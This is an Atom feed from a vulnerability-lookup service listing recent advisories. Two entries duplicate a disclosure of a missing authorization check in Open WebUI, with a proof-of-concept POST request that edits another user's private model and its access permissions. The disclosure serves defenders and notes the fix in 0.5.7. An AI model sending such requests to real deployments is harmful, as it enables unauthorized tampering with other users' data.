<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-08T06:13:09.532885+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-07134</id>
    <title>bdu:2026-07134</title>
    <updated>2026-10-08T06:13:09.538679+00:00</updated>
    <content>bdu:2026-07134</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-07134"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-319285</id>
    <title>EUVD-2026-319285</title>
    <updated>2026-10-08T06:13:09.538724+00:00</updated>
    <content>EUVD-2026-319285</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-319285"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-45345</id>
    <title>fkie_cve-2026-45345</title>
    <updated>2026-10-08T06:13:09.538747+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-45345"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-gm54-m39w-grjp</id>
    <title>GHSA-gm54-m39w-grjp — Open WebUI missing authorization check at the model update function - models from other users can be updated</title>
    <updated>2026-10-08T06:13:09.538792+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: open-webui</p>
<p>### Summary
A user can modify another user's model even if its visibility is set to `Private`.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.</p>
<p>### Details / PoC
The user `Victim` created a private model with the visibility set to `private`: 
![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)</p>
<p>The user `Attacker` can edit this model using the following POST request:
```
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers</p>
<p>{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}
```
Request / Response
![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)</p>
<p>### Impact
A user can modify another user's model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-gm54-m39w-grjp"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/pysec-2026-2727</id>
    <title>PYSEC-2026-2727 — Open WebUI missing authorization check at the model update function - models from other users can be updated</title>
    <updated>2026-10-08T06:13:09.538853+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: open-webui</p>
<p>### Summary
A user can modify another user's model even if its visibility is set to `Private`.
The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.</p>
<p>### Details / PoC
The user `Victim` created a private model with the visibility set to `private`: 
![grafik](https://github.com/user-attachments/assets/de057943-512b-46bf-8671-2904d55ec056)</p>
<p>The user `Attacker` can edit this model using the following POST request:
```
POST /api/v1/models/model/update?id=aaabraaa HTTP/2
Host: domain.local
//Some headers removed
Te: trailers</p>
<p>{"id":"aaabraaa","base_model_id":"gpt-4o-POC","name":"testmodel","meta":{"profile_image_url":"/static/favicon.png","description":"","capabilities":{"vision":true,"usage":false,"citations":true},"suggestion_prompts":null,"tags":[],"toolIds":["test"]},"params":{},"user_id":"565c82e6-083f-42bb-bf0f-a4e214cfb9ad","access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}},"is_active":true,"updated_at":1737314575,"created_at":1737121281}
```
Request / Response
![grafik](https://github.com/user-attachments/assets/19986403-b782-4288-b618-202b55519bb1)</p>
<p>### Impact
A user can modify another user's model even if its visibility is set to `Private`. By changing the access permissions during editing, unauthorized access can be gained.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/pysec-2026-2727"/>
  </entry>
</feed>
